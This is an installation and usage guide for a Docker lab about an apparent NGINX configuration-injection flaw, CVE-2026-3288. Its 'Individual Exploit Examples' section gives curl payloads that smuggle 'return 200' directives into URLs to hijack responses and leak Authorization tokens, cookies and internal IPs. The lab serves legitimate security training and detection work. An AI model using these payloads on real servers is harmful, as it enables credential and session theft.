# CVE-2026-3288 Lab - Installation Guide

## Quick Installation

### Prerequisites Check

```bash
# Check Docker
docker --version
# Required: Docker 20.10+

# Check Docker Compose
docker-compose --version
# Required: Docker Compose 1.29+

# Check Python
python3 --version
# Required: Python 3.6+

# Check curl
curl --version
```

### Step-by-Step Installation

#### 1. Navigate to Lab Directory

```bash
cd CVE-2026-3288-lab
```

#### 2. Make Scripts Executable

```bash
chmod +x exploits/*.sh
chmod +x exploits/*.py
chmod +x detection/*.sh
chmod +x cleanup/*.sh
```

#### 3. Start the Lab

```bash
# Start all containers
docker-compose up -d

# Check status
docker-compose ps
```

Expected output:
```
NAME                        STATUS
cve-2026-3288-backend       Up
cve-2026-3288-nginx         Up
cve-2026-3288-monitor       Up
```

#### 4. Verify Installation

```bash
# Test backend
curl http://localhost:8080/

# Test NGINX
curl http://localhost/

# Test health endpoint
curl http://localhost/health
```

#### 5. View Logs

```bash
# All logs
docker-compose logs

# NGINX logs only
docker-compose logs nginx

# Follow logs
docker-compose logs -f
```

## Running Exploits

### Automated Exploitation

```bash
cd exploits

# Install Python requirements
pip3 install requests

# Run all exploits
python3 exploit.py --all

# Run specific exploit
python3 exploit.py --hijack
python3 exploit.py --creds
python3 exploit.py --redirect
```

### Manual Exploitation

```bash
cd exploits

# Make executable
chmod +x test-exploits.sh

# Run manual tests
bash test-exploits.sh
```

### Individual Exploit Examples

```bash
# Response hijacking
curl 'http://localhost/api" return 200 "HACKED'

# Credential theft
curl -H "Authorization: Bearer secret" \
  'http://localhost/login" return 200 "Token: $http_authorization'

# Cookie theft
curl -H "Cookie: session=abc123" \
  'http://localhost/" return 200 "Cookies: $http_cookie'

# Internal IP leak
curl 'http://localhost/" return 200 "IP: $server_addr'
```

## Monitoring and Detection

### Start Log Monitoring

```bash
cd detection

# Make executable
chmod +x monitor-logs.sh

# Start monitoring
bash monitor-logs.sh
```

### Manual Log Inspection

```bash
# View access logs
docker-compose logs nginx | grep -E 'return|rewrite'

# View error logs
docker-compose logs nginx | grep ERROR

# Export logs
docker-compose logs nginx > nginx-logs.txt
```

## Troubleshooting

### Port Already in Use

```bash
# Check what's using port 80
sudo lsof -i :80

# Option 1: Stop conflicting service
sudo systemctl stop apache2  # or nginx

# Option 2: Change port in docker-compose.yml
# Edit ports section: "8080:80" instead of "80:80"
```

### Containers Won't Start

```bash
# Check Docker daemon
sudo systemctl status docker

# View detailed logs
docker-compose logs

# Rebuild containers
docker-compose down
docker-compose build --no-cache
docker-compose up -d
```

### NGINX Configuration Errors

```bash
# Test NGINX config
docker exec cve-2026-3288-nginx nginx -t

# View config
docker exec cve-2026-3288-nginx cat /etc/nginx/nginx.conf

# Restart NGINX
docker-compose restart nginx
```

### Backend Not Responding

```bash
# Check backend logs
docker-compose logs backend

# Test backend directly
docker exec cve-2026-3288-backend curl http://localhost:5000/

# Restart backend
docker-compose restart backend
```

### Python Script Errors

```bash
# Install missing dependencies
pip3 install requests

# Run with verbose output
python3 exploit.py --all -v

# Check Python version
python3 --version  # Should be 3.6+
```

## Cleanup

### Stop Lab

```bash
# Stop containers
docker-compose stop

# Stop and remove containers
docker-compose down

# Remove containers and volumes
docker-compose down -v
```

### Complete Cleanup

```bash
cd cleanup

# Make executable
chmod +x cleanup.sh

# Run cleanup script
bash cleanup.sh
```

### Manual Cleanup

```bash
# Remove containers
docker-compose down -v

# Remove images
docker rmi cve-2026-3288-lab_nginx
docker rmi cve-2026-3288-lab_backend

# Remove volumes
docker volume prune

# Remove networks
docker network prune
```

## Verification Checklist

- [ ] Docker and Docker Compose installed
- [ ] Lab containers running (`docker-compose ps`)
- [ ] NGINX responding on port 80
- [ ] Backend responding on port 8080
- [ ] Exploit scripts executable
- [ ] Python requests library installed
- [ ] Can run automated exploits
- [ ] Can run manual exploits
- [ ] Log monitoring working

## Next Steps

After successful installation:

1. Read the main [README.md](README.md) for vulnerability details
2. Review [payloads.txt](exploits/payloads.txt) for exploit examples
3. Run automated exploits: `python3 exploits/exploit.py --all`
4. Try manual exploitation: `bash exploits/test-exploits.sh`
5. Monitor logs: `bash detection/monitor-logs.sh`

## Support

If you encounter issues:

1. Check the Troubleshooting section above
2. Review Docker logs: `docker-compose logs`
3. Verify prerequisites are met
4. Ensure no port conflicts
5. Try rebuilding: `docker-compose build --no-cache`

---

**For authorized security training only**